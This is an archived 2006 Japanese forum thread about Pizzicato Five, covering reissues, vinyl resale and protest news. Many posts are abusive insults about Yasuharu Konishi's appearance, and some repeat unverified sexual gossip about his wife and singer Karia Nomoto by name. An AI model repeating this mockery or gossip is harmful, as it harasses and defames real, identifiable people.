2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【さ・え・ら】ピチカートファイヴ その7【ジャポン】

1 :伝説の名無しさん:2006/05/21(日) 20:33:00
公式
http://columbia.jp/~pizzicato/
http://www.sonymusic.co.jp/Music/Arch/SR/PizzicatoFive/
小西
http://www.readymade.co.jp/
野宮
http://www.missmakinomiya.com/
http://blog.excite.co.jp/makinomiya/
プロモーション盤の紹介
http://www2p.biglobe.ne.jp/~tosh-o/p5/
http://www.pizzicatofive.net/Main/

前スレ
【ウゴウゴ】ピチカートファイヴ その5【ルーガ】
http://music4.2ch.net/test/read.cgi/legend/1133669203/l50

2 :伝説の名無しさん:2006/05/21(日) 20:33:49
過去スレ
【小西】ピチカートファイブ【野宮】
http://music2.2ch.net/test/read.cgi/legend/1021431246/
【東京は】ピチカートファイブ その2【夜の七時】
http://music4.2ch.net/test/read.cgi/legend/1061251205/
【pizzicato five】 ピチカートファイヴ その3
http://music4.2ch.net/test/read.cgi/legend/1086349629/
【ハッピー】ピチカートファイブ その4【サッド】
http://music4.2ch.net/test/read.cgi/legend/1100365903/
【メッセージ】ピチカートファイヴ その5【ソング】
http://music4.2ch.net/test/read.cgi/legend/1119263834/
【ウゴウゴ】ピチカートファイヴ その5【ルーガ】
http://music4.2ch.net/test/read.cgi/legend/1133669203/

3 :伝説の名無しさん:2006/05/21(日) 22:07:39
>>1


4 :伝説の名無しさん:2006/05/22(月) 02:15:41
615 名前:伝説の名無しさん 投稿日:2005/10/14(金) 21:01:57
ttp://www.storehouse.ne.jp/rog/cafe/kadai/2001-2/masu2.htm
このページの「2.ポップということ」というところを読んでみてください。

「皆さん、今夜はhideさんの追悼ということで、盛り上がった所では「ヒデー!」と叫んでくださいね。」
という発言を、ここに書いてあるように、本当に”自分のファンにhideのファンなどいない(あるいはいてほしくない)”という意図
をもってしているとしたら(私は確実にそうだと思っていますが)、酷すぎると思いませんか?

たとえば、ヒデを好きな女の子がラジオで聞いたピチカートの曲を気に入った場合、
小西はこの女の子を受け入れてあげようと思わないのでしょうか?
そしてこの女の子がライブに来たとした場合、このような発言を聞いたとしたらどう思うでしょうか?

自分の作品が誰かの心に届いたなら、それがどんな人であろうと、
普通のアーティストなら嬉しく思うはずですが、醜い選民意識を持つピチカートは違うようですね。
人が死んでいるというのに、こんな悪趣味な冗談を飛ばす奴や
それを聞いて喜ぶ奴らを私は許すことが出来ません。

5 :伝説の名無しさん:2006/05/22(月) 02:16:26
【東京は】野本かりあってどうなのよ?【夜の7時】
http://music5.2ch.net/test/read.cgi/musicjf/1148221519/

新スレ!

6 :伝説の名無しさん:2006/05/22(月) 02:16:33
http://www.mkimpo.com/diary/2004/rave_04-02-22a.html

★ビートに身ゆだね「反戦」 アーティストら音楽デモ

・音楽のビートに体をゆだね、踊りながら自衛隊イラク派遣反対を訴える「サウンド
 デモ」が22日、東京・渋谷であり、約500人が参加した。
 デモの先頭でターンテーブルやスピーカーなどのシステムを操るDJとして、
 元「ピチカート・ファイヴ」の小西康陽(こにし・やすはる)さんや「クルーエル・
 レコード」の滝見憲司さんら、“渋谷系”と呼ばれたアーティストも参加。ポップな
 雰囲気で反戦をアピールした。

 デモは「人道支援の派遣だなんてふざけた言い訳」「小泉なんかにだまされるなよ!
 戦争反対!」などとリズムに乗せて叫びながら行進。
 青山通りや表参道、公園通りなど若者に人気の街を約2時間練り歩き、出発時
 300人だった列が飛び入り参加者で膨らんだ。

http://www.mkimpo.com/image/walk/2004/02-22/P2220168s.jpg

http://www.mkimpo.com/image/walk/2004/02-22/P2220165s.jpg

7 :伝説の名無しさん:2006/05/22(月) 02:18:05
こにたん…

8 :伝説の名無しさん:2006/05/22(月) 02:54:20
腹黒くて目が細くて肌がボコボコで鼻毛が出てて 歯茎がグチャグチャで頭ボサボサのフケだらけで
パラノイアでキモデブなのに、田舎者やおバカな信者におだてられ、いっちょ前の音楽家と勘違いして、
いい気になって大物ぶって他人を馬鹿にして調子に乗りまくったあげく、俺は細野大滝を越えたとのたまう
馬鹿極まりない典型的な裸の王様の小西にはもううんざり。

9 :伝説の名無しさん:2006/05/22(月) 02:55:27
なーにがコニシだよです。オシャレがきいてあきれるぜ、です。
やつわただのオサレおたくだよです。みてごらんおたくの顔つき
だぜです。むかしのネタひっぱってテメーの手柄にするなってのです。
キッチュでかわいいかなんかいわれっからますますつけあがるぜです。
なにがクラブシーンだばかわです。インテリにとんがってるとでも
思ってんのかあのばかわです。てめーみてーにおどれねーやつが
ダンスミュージックっぷりすんなぼけがです。村上龍もそういう意味
で同罪だです。あーださださです。だいたいあのルックスみてみれよ、
部品がおおすぎるぜ、きたねーひげはやめろよ、おめーのあたまは
ヘルメットかってんだです。おたくらしく部屋でゲームミュージック
でも作ってろです。ふう、です。


10 :伝説の名無しさん:2006/05/22(月) 02:56:06
コニシのつくるもんで満足かいオメーらわです。ぽっぷでオサレな気分
にでもひたってろやカスどもがです。コニシ=センスがいいなんて大声で
いってくれちゃってるそこのキミ、いやオマエ、もうすぐにそんな自分が恥ずかしいこと
がわかるぜです。やつのつくるものわ消費財だぜです。日本人の中に潜在する
洋楽外人崇拝志向をうめーぐあいにくすぐりやがってあくどいぜです。おめーら
コニシなんぞにつきあってCDかっていっしょにオサレごっこしてろや、ほら
レビューがはじまるよです。アオヤマあたりでハナイキあらくしてろってんだです。
オサレばんざいです。ふう、です。

11 :伝説の名無しさん:2006/05/22(月) 02:57:03
       ■■■■■■■■
        ■■■■■■■■■■■■
       ■■■■■■■■■■■■■■
      ■■■■■■ 〜〜 ■■■■■■
    ■■■■■■〜〜〜〜〜〜■■■■■■
   ■■■■■ 〜〜〜〜〜〜〜〜 ■■■■■
   ■■■■■   ■■〜〜■■   ■■■■■        __________
 ■■■■■  ■■■■〜〜■■■■  ■■■■■     /
 ■■■■         ||          ■■■■   / ピカチンポマニアのみなさんこんばんは
■■■■■   〓〓〓〓||〓〓〓〓   ■■■■■ <   私の名前は粉似氏カスハル
■■■■   〓〓     ||    〓〓   ■■■■   \  ピカチンポファイブで二番目に不細工なメンバーです
■■■■        //  \\       ■■■■     \
■■■■      //( ●● )\\     ■■■■       ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
■■■■    // ■■■■■■ \\   ■■■■
■■■■■  / ■■■■■■■■ \  ■■■■■
■■■■■   ■/〓〓〓〓〓〓\■   ■■■■■
■■■■■■ ■ /▼▼▼▼▼▼\ ■ ■■■■■■
■■■■■■■■■ ▼▼▼▼▼▼ ■■■■■■■■■
 ■■■■■■■■■   ■■   ■■■■■■■■■
 ■■■■■■■■■■■■■■■■■■■■■■■
 ■■■■■■■■■■■■■■■■■■■■■■■■


12 :伝説の名無しさん:2006/05/22(月) 02:59:19
小西康陽 w

13 :伝説の名無しさん:2006/05/22(月) 03:02:33
いつまでもしつこく粘着してる奴ってもしかしてDJしてる小西邪魔してキレられた奴か

14 :伝説の名無しさん:2006/05/22(月) 03:28:43
こにタンとその信者を馬鹿にしたら細野さんが
(極めて0に近い確率で)黙ってないぞ!


15 :伝説の名無しさん:2006/05/22(月) 04:33:50
>>9 >>10
ローゼンメイデンの翠星石風に読むと萌える

16 :伝説の名無しさん:2006/05/22(月) 07:48:02
五年間も煽り続けるという継続力には感服いたします。
この粘り強さが社会に生かせていたら、すばらしい人物になっていたでしょうに。

17 :伝説の名無しさん:2006/05/22(月) 10:24:02
4~11ってテンプレだろ?

18 :伝説の名無しさん:2006/05/22(月) 12:16:52
アニオタはピチカート聴いてると自分が名誉白人にでもなったように錯覚する
電気グルーブと同じ

19 :伝説の名無しさん:2006/05/22(月) 21:52:27
>>16
同意、ほんとになぁ……

>>17
確かにテンプレみたいなもんだな。

>>18
ほほう、電気とな。
その比較はおもしろいのでもう少し語ってくれたまえ。

20 :伝説の名無しさん:2006/05/23(火) 01:52:10
作家気取りはせべ社長のバブリーぶりが気になる。


21 :伝説の名無しさん:2006/05/23(火) 07:32:46
・音響機材を積んだトラックを先頭に、踊って行進する「サウンドデモ」。先月30日、フリーター
 団体が主催したこのデモで、音響を操作するDJが道路交通法違反容疑で現行犯逮捕された。
 従来は認められていただけに「表現の自由への侵害」という反発も強い。国民的論議となった
 共謀罪導入で、政府は恣意的な運用はないと釈明する。しかし、今回の件をみる限り、懸念は
 強まるばかりだ。

 当日は、午後からJR原宿駅に近い神宮前穏田区民会館で集会を持ち、夕方から渋谷駅方面へ
 向けて約二・五キロのサウンドデモを予定。約百人が参加した。

 「嫌な感じはあった。集会前から会館近くに私服警官が数十人集まって、参加者をビデオ撮影。
 しかもデモ規制の警官は、約百八十人で参加者の倍近くいた」と主催者の一人は語る。
 勘は的中し、デモ開始からわずか十五分ほどで、先導の音響トラックの荷台でDJを務めていた
 三十代の団体非常勤職員Aさんが道路交通法違反容疑で逮捕され、その混乱で別の男性も公務
 執行妨害容疑で逮捕。
 サウンドデモは歩道からの飛び入りも多い。だが、この日は歩道側にも警官が並んで歩き、
 新規の参加者をブロック。渋谷駅前の交差点近くでは、同じく三十代の予備校講師Bさんが
 公妨容疑で逮捕された。

 同副署長は「表現の自由との兼ね合いで、音を出すなとか、デモを認めないというのではない。
 助手席での音響操作なら問題はないが、荷台上での違法な形態は認められない」と話す。

 今回もデモの許可申請は先月二十一日に出され、二十八日に都公安委員会と原宿署長が
 認めた。原宿署へのデモ申請段階で、主催者側はサウンドデモをすると言明している。

22 :伝説の名無しさん:2006/05/23(火) 07:51:22
画像のリンクが無いなんてつめの甘いことで

23 :伝説の名無しさん:2006/05/23(火) 20:41:57
小西ごときに詰めなど無用だろw

24 :伝説の名無しさん:2006/05/24(水) 02:23:14
394 名前: 伝説の名無しさ 投稿日: 02/10/11 01:43
長谷部地裁は編集なんかじゃないよ。
こにたんがDJやってたバー青山のホステス兼注文取り。
仕事はDJのブッキングという事だがぼーっと店に居て
チャージ集めてただけ。おきにのDJにはそれなりだが
気にいらんやつには『jwaveみたい』だの辛口な事ばっか
言って夜の蝶きどりだった。
奴もまだ27、8だったので一発やれるかみたいな感じで
野郎がちょろちょろして、なんか勘違いな痛い女だなー
みたくみんなに思われてた。
で、オーナー(薬漬け)ともめて関わるDJ全てに
『あたしはやめるけど、あなたはこの店でまだやるの?』
などと勝手に自分の持ち駒の様にのたまったそうな。

まあこにたんも一発やったクチなのです。
で、ちさいがここでこにたんの下半身と貯金通帳の管理をはじめたと。
で、最初の嫁と離婚、今にいたる。

実際は彼女の仕事はパトロン付きの駄文ライターという事でした。


25 :伝説の名無しさん:2006/05/24(水) 07:44:08
こいつらインチキ夫婦だなw

26 :伝説の名無しさん:2006/05/24(水) 07:47:23
993 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:44:49

994 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:45:30

995 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:46:20

996 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:47:03

997 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:47:37

998 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:48:09

999 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:48:44

1000 名前: 伝説の名無しさん Mail: sage 投稿日: 2006/05/24(水) 06:53:53



27 :伝説の名無しさん:2006/05/24(水) 07:49:11
まあ消えへんのですけどね

28 :伝説の名無しさん:2006/05/24(水) 20:01:35
↑本人乙

29 :948:2006/05/24(水) 22:40:32
今日発売のはどうよ? 買う価値あり?

30 :伝説の名無しさん:2006/05/24(水) 22:48:09
なし

31 :伝説の名無しさん:2006/05/25(木) 00:01:32
小西ダサ過ぎす

32 :伝説の名無しさん:2006/05/25(木) 00:46:26
再販全部買ってグッズもらおうかな

33 :伝説の名無しさん:2006/05/25(木) 04:56:55
ベスト何枚出るのよw

34 :伝説の名無しさん:2006/05/25(木) 07:47:02
キモオタの巣窟だなw

35 :伝説の名無しさん:2006/05/25(木) 11:55:18
↑本人乙

36 :伝説の名無しさん:2006/05/25(木) 22:48:43
ほんといつまでもよくやるな。
中毒なんだろうな。一日一回ココに書き込まないと気が済まない。

37 :伝説の名無しさん:2006/05/25(木) 23:45:14
↑オマエもな

38 :伝説の名無しさん:2006/05/26(金) 22:37:41
363 名前: 伝説の名無しさん 投稿日: 02/09/26 13:58
はせべちさい程のビッチを知りません。
こにたんやるなあと思う。

ttp://music.2ch.net/legend/kako/1021/10214/1021431246.html


39 :伝説の名無しさん:2006/05/27(土) 00:25:12
まぁ、そんな事より
コニシは糞 ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

40 :伝説の名無しさん:2006/05/27(土) 09:02:06
宗教

41 :伝説の名無しさん:2006/05/27(土) 22:19:07
>>1
おやおや、新スレ立てたんだね。
どーせ立てても、又、いままで同様に荒れるだけだから、
遂に立てるのヤメタのかと思ってたけど、結局、立てるのか…。
ん〜、無駄なような気もするが…。ま、いいか。

「pizzicato five we dig you」のアナログ盤2種、皆、買った ?
思うに、今回の一連の再発の中で唯一の収穫はコレだと思うよ。
ジャケがナイス。7/7(金)は、京都メトロでリリースパーティーだそうだ。


42 :伝説の名無しさん:2006/05/28(日) 02:34:39
>>41
オマエもキノコ頭したキモオタだろw

43 :伝説の名無しさん:2006/05/28(日) 07:59:54
>>41
文章がキモい

44 :伝説の名無しさん:2006/05/28(日) 13:29:04
>>41
いやさ、スレ立てしてるのがアン(ry

45 :伝説の名無しさん:2006/05/28(日) 18:06:32
>>41
>皆、買った ?
皆が買う訳ないだろタコ

46 :伝説の名無しさん:2006/05/28(日) 18:40:08
ttp://page11.auctions.yahoo.co.jp/jp/auction/n40467962

こんな高額で落札するなんて、落札者は馬鹿としか言いようがない。
転売屋出品者の煽り文句に踊らされて、思うツボに嵌められた訳だ。
渋谷のレコ屋じゃまだ沢山売っていたのに(勿論定価で)。ホント、馬鹿。


47 :伝説の名無しさん:2006/05/28(日) 20:21:24
熱烈なファンのフリをするのが一番の釣りのようですな

48 :伝説の名無しさん:2006/05/28(日) 20:52:12
頑張ってください

49 :伝説の名無しさん:2006/05/28(日) 22:46:33
「ピチカート・ファイヴ・オーディオ・ライナーノーツ」(CD)
これってどういうCDなんだろう

50 :伝説の名無しさん:2006/05/28(日) 23:54:26
昔500枚限定とかで通販されてた東京の合唱の12インチを
オクで定価の5倍くらいの値段で売っぱらった時は
信者の必死さに笑いが止まらなかった。

51 :伝説の名無しさん:2006/05/29(月) 00:02:10
よかったですね

52 :伝説の名無しさん:2006/05/29(月) 01:44:37
>>49
以前、CD「きみになりたい」リリース時、
readymade international の通販で購入した人に、
そのアルバムの収録各曲について、小西さんが声で解説したのを収録したCDを、
先着で特典としてあげていたけど、多分、今回のもそういう感じのモノなんじゃないの ?
言わば

53 :伝説の名無しさん:2006/05/29(月) 01:50:20
>>52
>小西さんが声で解説したのを収録したCD
いくらなんでもキモ過ぎ

54 :伝説の名無しさん:2006/05/29(月) 01:58:57
キモ小西キモ〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜

55 :伝説の名無しさん:2006/05/29(月) 03:31:23
ラジオみたいな感じで聴けばいいじゃない

56 :伝説の名無しさん:2006/05/29(月) 06:02:44
ピチカートのベストって、ジャケットも構成も凝っていて良いよね、といまさらのレス。

57 :伝説の名無しさん:2006/05/29(月) 06:28:03
>>42
キノコ頭って最近ではバナナマンのきもい方くらいだよな

58 :伝説の名無しさん:2006/05/29(月) 06:31:27
12inch pizzicato five we dig you



プレミア価格で買った奴は阿呆です。異常。以上。

59 :伝説の名無しさん:2006/05/29(月) 06:51:38
定価で普通に買える通販サイト知ってるからそこで買おうっと。

60 :伝説の名無しさん:2006/05/29(月) 07:26:30
BOXセットだったらポーンと買ってしまいそうだけど、
バラで全部そろえるのってなんかめんどくさい

61 :伝説の名無しさん:2006/05/29(月) 13:58:48
フツーに1575円だよ
ttp://m%6foo.jp/widigyou

62 :伝説の名無しさん:2006/05/29(月) 18:51:15
イラネ

63 :伝説の名無しさん:2006/05/29(月) 22:57:00
URLアップしちゃうと、何気に、2~3日で
soldoutになっちゃったりして・・。

どうせなら、12inch×2のセットでリリースして欲しかったな。
高価で買うほどの商品ではないけど、
内容が良いのは間違ってないと思う・・・

64 :伝説の名無しさん:2006/05/29(月) 23:38:30
このスレも伸びてるし、さすが話題が絶えないね!

65 :伝説の名無しさん:2006/05/30(火) 07:52:06
12inchは早く買わないと売り切れるよ。


66 :伝説の名無しさん:2006/05/31(水) 00:24:33
ロマンティーク96ってアマゾンの説明だとライヴアルバムだということだけど
HP見るとそんな風に書いてないんだよね
実際どっち?

67 :伝説の名無しさん:2006/05/31(水) 00:41:49
>>66
ほんとだ、アマゾンのレビュー間違ってるね。
ロマンティーク96は、スタジオ・レコーディングのオリジナル・フルアルバムだよ。

68 :伝説の名無しさん:2006/05/31(水) 01:13:53
書き込みして、それにレスして。
何を一人でやってんだか…。
楽しいんかい ? そんなことして( ´_ゝ`)

69 :伝説の名無しさん:2006/05/31(水) 05:23:43
>>68
はい




( ´_ゝ`)

70 :伝説の名無しさん:2006/05/31(水) 09:43:05
>>67
サンクス

71 :伝説の名無しさん:2006/05/31(水) 14:41:08
(ノ∇≦*)

72 :伝説の名無しさん:2006/06/01(木) 00:52:54
キモオタ
キモス

73 :伝説の名無しさん:2006/06/01(木) 00:54:19
ピチカート好きな人って、
お洒落に憧れるキモい奴のこというんでしょ?

74 :伝説の名無しさん:2006/06/01(木) 07:29:38
とキモいオッサンが言っております

75 :伝説の名無しさん:2006/06/01(木) 15:14:10
↑ただのキモい奴w

76 :伝説の名無しさん:2006/06/01(木) 17:13:16
>>61
完売御礼。プレミア確実。

77 :伝説の名無しさん:2006/06/01(木) 17:14:26
>>76
おまえバカだろw


78 :伝説の名無しさん:2006/06/01(木) 19:15:11
他の店検索すればまだまだたくさんある

79 :伝説の名無しさん:2006/06/02(金) 00:04:32
小西妻&かりあの日記、おもしろーい。

80 :伝説の名無しさん:2006/06/02(金) 16:29:16
ヤフオクの異常なプレミアはなんなの?あほらし。

81 :伝説の名無しさん:2006/06/03(土) 13:02:14
キモ コニシ
頼むから消えてくダサイ

82 :伝説の名無しさん:2006/06/03(土) 13:22:39
ケーブルテレビでやってた魔女っ子アニメのエンディングがヘボすぎて笑えた。

83 :伝説の名無しさん:2006/06/03(土) 20:20:15
かりあ下手すぎだよな

84 :伝説の名無しさん:2006/06/03(土) 21:59:20
いや、けっこううまいらしいよ

85 :伝説の名無しさん:2006/06/03(土) 22:04:59
ふぇらが

86 :伝説の名無しさん:2006/06/03(土) 22:05:48
マジ?

87 :伝説の名無しさん:2006/06/04(日) 01:08:25
自演乙

88 :伝説の名無しさん:2006/06/04(日) 01:52:03
「聖三角形」の元ネタはビリー・ポール?
ピチカのほうが色っぽい。

89 :伝説の名無しさん:2006/06/04(日) 05:05:21
ピチカートは好きだけど再発再発には腹が立つ。
そんなことするならソニー時代のをきちんと再発して欲しい。

90 :伝説の名無しさん:2006/06/04(日) 06:29:28
>>89
再発には腹が立つ癖に、
きちんと再発しろとは、これまた滑稽なことを仰るお方だこと… w
それに、ソニー時代のカタログは、随分前にきちんと再発したじゃん。

91 :伝説の名無しさん:2006/06/04(日) 10:48:54
アレ以外ソニーに音源は残ってないらしいしね

92 :伝説の名無しさん:2006/06/04(日) 13:46:02
we dig youのアナログの売れ行きに気を良くした、
御大は増産することを決めたってよ。
限定1000枚から限定5000枚に。

大量に買い占めた転売ヤーは死亡ですか?ニヤニヤ

93 :伝説の名無しさん:2006/06/04(日) 13:58:00
そうなんだ。各50枚仕入れちゃったよ。

94 :伝説の名無しさん:2006/06/04(日) 14:38:33
いまどきピチカートなんて買ってるヤツって何なの?バカなの?

95 :伝説の名無しさん:2006/06/04(日) 15:00:47
>>90
>>89だけど
「きちんと」というのは削られてる曲をちゃんと入れろってこと。
女王陛下、月面両方とも一曲ずつ入ってない。
再発するたびこの二曲ってスルーじゃん。

96 :伝説の名無しさん:2006/06/04(日) 20:50:22
>>95
別に、1曲ぐらい落ちていたっていいじゃねーかよ。
アンタも、オリジナルは持っているんだろ ?
その分、オリジナルの価値が高まって良いぞ。
足りない分は、そっちを聴いてろよ。


97 :伝説の名無しさん:2006/06/05(月) 04:43:14
http://www.ionpromotion.net/blog/yamashiro/

98 :伝説の名無しさん:2006/06/05(月) 22:32:49
>>97に曲を落としてる理由が書いてあると思って開いた俺は負け組

99 :伝説の名無しさん:2006/06/06(火) 03:25:12
結局月面の方は民生絡み、女王陛下はサンプリングのネタ問題で抜けた?
やっぱり月面は「これは恋ではない」があってこそだと思うから残念。

100 :伝説の名無しさん:2006/06/06(火) 08:40:42
100ゲッターのピチカート・ファイヴ

101 :伝説の名無しさん:2006/06/07(水) 09:16:45
スレと関係ないけどさ、こないだうちのコンビニにヤクザが来たんだよ。
レジ打ちするとき、会計が893円でおもいっきし笑っちった。
そのヤクザはメチャクチャ俺のこと睨みながら1003円出したんだけど、
そしたらお釣りが110円でさらに爆笑

俺の暗算速度は超速いぜ
コンビニでレジ打ちのバイトしてた時に会計が777円で、客が1000円
出した瞬間に333円返してやった
あまりの速さに客は目を丸くして驚いてたぜ

102 :伝説の名無しさん:2006/06/07(水) 20:08:31
古いコピペっすね

103 :伝説の名無しさん:2006/06/07(水) 23:34:45
五年前から時が止まってますから

104 :伝説の名無しさん:2006/06/08(木) 02:56:43
今年出たジャケ違いのを全部まとめて買った。
CD屋の店員に「こうズバッと買うと気分良いんじゃないですか?」
と言われたが、実際は『はらわた煮えくりかえり状態』だった。
「やなら買わなきゃ良い。」と思われるだろうが、マニアだから買わざるを得ない。
何年か毎に恒例行事みたいにこんな形で出すのはいつまで続くのだろうか。
実際、初回発売の特殊ジャケットのも普通に今でも手に入るショップもあるのに。

105 :伝説の名無しさん:2006/06/08(木) 04:40:36
>>94
うん、馬鹿だよ。


で、何か??

106 :伝説の名無しさん:2006/06/08(木) 05:36:53
オマケ音源が付いてるならわかるけど
ジャケ違い買って怒るのはどうかしてる

107 :伝説の名無しさん:2006/06/08(木) 06:42:07
104は、どう見ても釣りだな。( ´_ゝ`)




108 :伝説の名無しさん:2006/06/08(木) 22:05:34
http://video.google.com/videoplay?docid=221651909938629424&q=pizzicato

109 :伝説の名無しさん:2006/06/08(木) 22:24:23
北海道のド田舎出身の小西が「トーキョー」に
憧れるのは解るが・・反応する奴も大体そんな者だろうw

110 :伝説の名無しさん:2006/06/08(木) 22:39:12
トーキョートーキョーってうるせーなと思ってた数年前、道産子と知って納得した。

111 :伝説の名無しさん:2006/06/08(木) 23:35:38
オタ臭夫と香水臭妻
どちらも地方出身者

112 :伝説の名無しさん:2006/06/08(木) 23:52:06
>>106
●3/31に発売された17タイトルと、5/24発売のcut-upアルバム
「pizzicato five we dig you」をご購入の方にもれなく
小西康陽監修・出演「ピチカート・ファイヴ・オーディオ・ライナーノーツ」
(CD)をプレゼントいたします。

これだ(´∀`)9 ビシッ

113 :伝説の名無しさん:2006/06/09(金) 00:03:44
>>109

724 名前:伝説の名無しさん 投稿日:2006/04/07(金) 06:26:03
田舎者がルサンチマンをバネに必死に作り出したオシャレムーブメントを
同じくルサンチマンを抱えた大勢の田舎者が必死で追っかけていく。
それがピカチンポ・五本

114 :伝説の名無しさん:2006/06/09(金) 00:41:07
朝の六時半にそんなこと書いてる人って、どんな生活してるんだろ

115 :伝説の名無しさん:2006/06/09(金) 22:02:31
出勤直前なんじゃね?

116 :伝説の名無しさん:2006/06/10(土) 03:18:18
【ラブ・タンバリンズ】eli【99 1/2】
http://music4.2ch.net/test/read.cgi/legend/1125817239/
Girl 't's U名義で6月半ばにアルバム発売!!!


117 :伝説の名無しさん:2006/06/10(土) 06:08:07
教祖様
http://bbs.2ch2.net/angstrom/img/1143824659/0013.jpg


118 :伝説の名無しさん:2006/06/10(土) 08:20:22
キャッチー
キャッチーキャッチーキャッチー
キャッチー

変な歌

119 :伝説の名無しさん:2006/06/10(土) 10:28:30
>>109
田舎面をキノコ頭とヒゲとメガネで隠しても、
どんなに着飾っても、化けの皮は既にもう剥げかかってる



120 :伝説の名無しさん:2006/06/10(土) 22:57:47
Yeah here tokyo way back style


121 :伝説の名無しさん:2006/06/11(日) 00:45:40
剥げかかっているじゃなくて、
剥がれかかっているじゃないかい?

122 :伝説の名無しさん:2006/06/11(日) 07:03:32
>>118
学生の頃その歌を聴いてたらオカンにダサい歌だとバカにされた。
当時はムカついたが、今はオカンの言うとおりだったと思う。

123 :伝説の名無しさん:2006/06/12(月) 18:15:25
今回の再発の特典ってきたないよな。
18枚全部買わないと貰えないんだろ?
しかも、全然再発のCD売ってないし。
THE BOOMの再発の特典なんて、3枚買えば貰えたってのに・・・。

124 :伝説の名無しさん:2006/06/12(月) 21:14:04
ここで信+者=儲のコピペが貼られる

125 :伝説の名無しさん:2006/06/12(月) 21:19:19
ごあ

126 :伝説の名無しさん:2006/06/12(月) 23:20:00
>しかも、全然再発のCD売ってないし。
>しかも、全然再発のCD売ってないし。
>しかも、全然再発のCD売ってないし。

プッ。兄ちゃん、アンタどんだけ田舎に住んでんだよ ww

127 :伝説の名無しさん:2006/06/13(火) 01:43:07
>>123
ちゅーかさぁ、リマスタリングもしていなけりゃ、ボーナストラックも付いてない。
でもって、ジャケットは、何だか知らんが不細工な統一性を持たせての改悪。

こんなの頼まれたって買わないっつーの。オリジナル持ってるから、それで十分だ。
特典っつーのも、小西さんの音声解説CDだろ ? 要らねぇ、要らねぇ、そんなの。
こんな仕様の全カタログを買うマニアは居るだろうなんて踏んでいる、
コロムビアのスタッフは、阿呆そのもの。いっぺん死んだ方がいいよ。

128 :伝説の名無しさん:2006/06/13(火) 04:35:01
>>127
小西は、「さん」付けで呼ぶ程の者ではない
小西は、コニシ。
キモい、ただの糞!


129 :伝説の名無しさん:2006/06/13(火) 06:59:24
糞に失礼だろ?

130 :伝説の名無しさん:2006/06/13(火) 08:43:17
小西様のCDは買うべきだね。

131 :伝説の名無しさん:2006/06/13(火) 10:39:28
完全未収録音源だけで作られた
一枚のLPや、7inchセットみたいのをプレゼントすれば、
馬鹿みたいに買い漁る奴が出てきたんだろうな。

132 :伝説の名無しさん:2006/06/13(火) 20:03:37
そうだね。
買ったCDは売り払えば何割か戻ってくるわけだし、
戻ってこなかった総額でレア盤買ったと思えばいい

133 :伝説の名無しさん:2006/06/13(火) 20:55:50
↑詞ねやキチガイwwwwwwwwwww


134 :伝説の名無しさん:2006/06/14(水) 18:35:16
【評論家】音楽雑誌全ジャンル統一スレ【メディア】
http://music4.2ch.net/test/read.cgi/msaloon/1150276280/

遊び来てね

135 :伝説の名無しさん:2006/06/17(土) 13:05:19
>>128
小西と一緒にするなんて、糞があまりにもかわいそうだ。

136 :伝説の名無しさん:2006/06/17(土) 15:17:10
les 5-4-3-2-1っていうピチカートっぽい名前のグループの
『“1973”』というタイトルのCDが新品で安く売ってたので、
買ってみたら、曲もピチカートっぽくてワロタw

137 :伝説の名無しさん:2006/06/17(土) 16:29:26
wedigのアナログってプレミア付いてるの?
付いてないよね?CD聞いたけど、うんこ級だったし(・∀・)

138 :伝説の名無しさん:2006/06/18(日) 02:55:58
蜘蛛をつぶした液とゴキブリを潰した液と
ウジ虫を潰した液とビチ糞を混ぜたモノよりキモい小西
おえぇぇ〜〜〜〜〜〜!!!!

139 :伝説の名無しさん:2006/06/18(日) 15:34:37
>>136
渋谷系の末期症状のグループだな。
ファントムギフトか……。

140 :伝説の名無しさん:2006/06/18(日) 22:21:22
村上春樹のエッセイにles 5-4-3-2-1が出てくる

141 :伝説の名無しさん:2006/06/18(日) 22:48:23
ヲエ

142 :伝説の名無しさん:2006/06/19(月) 00:16:58
春樹クンには早くノーベル文学賞を受賞して、ノーベル賞が如何に低レベルに
なったかを示してほしいものだな。

143 :伝説の名無しさん:2006/06/19(月) 00:45:07
やれやれ

144 :伝説の名無しさん:2006/06/22(木) 20:05:40
知り合いにピチカートと村上春樹とボサノバとカフェめぐりが好きな奴がいる

145 :伝説の名無しさん:2006/06/22(木) 20:24:30
好きな漫画は島耕作とお見受けした

146 :伝説の名無しさん:2006/06/22(木) 21:30:43
小西も外見さえまともなら、田島や小山田みたいに
ひとりユニットとしてやっていけたろうに…

147 :伝説の名無しさん:2006/06/22(木) 21:50:03
>>146

全裸緊縛【小山田圭吾】 強制食糞
http://music4.2ch.net/test/read.cgi/legend/1118661206/

糞同士・・早く消えろや


148 :伝説の名無しさん:2006/06/22(木) 21:52:59
DJ業がんばってYO!
メロウなトラックかけてYO!

149 :伝説の名無しさん:2006/06/22(木) 22:01:14
>>146
ひどいのは外見だけじゃない。曲も駄目。だから無理。
もっとも、田島はともかく小山田が良い曲書いてるとは思わんけど
まあ、お化けキノコよりはうんとマシだな

150 :伝説の名無しさん:2006/06/22(木) 22:39:05
高浪は今なにやってんの?
佐々木、田島時代の曲を聴くかぎりでは、小西より作曲できそうなんだけど。

151 :伝説の名無しさん:2006/06/22(木) 23:13:43
>>148
渋谷とか新宿でよくやってるお

152 :伝説の名無しさん:2006/06/23(金) 21:37:15
小西斜陽

153 :伝説の名無しさん:2006/06/24(土) 01:59:09
チェケラッチョンおしゃれ手帳

154 :伝説の名無しさん:2006/06/24(土) 11:36:06
>>149
でもキノコにたとえるなら、松茸だよな。
エノキダケじゃないだろ。

155 :伝説の名無しさん:2006/06/24(土) 17:36:44
まぁ香り松茸
味しめじというがな

156 :伝説の名無しさん:2006/06/24(土) 18:00:07
びち糞に生えた毒キノコ以外ありえねー

157 :伝説の名無しさん:2006/06/24(土) 20:18:54
糞キノコって不潔そうだよな。
爪の間に黒いのがいっぱい溜まってそう。

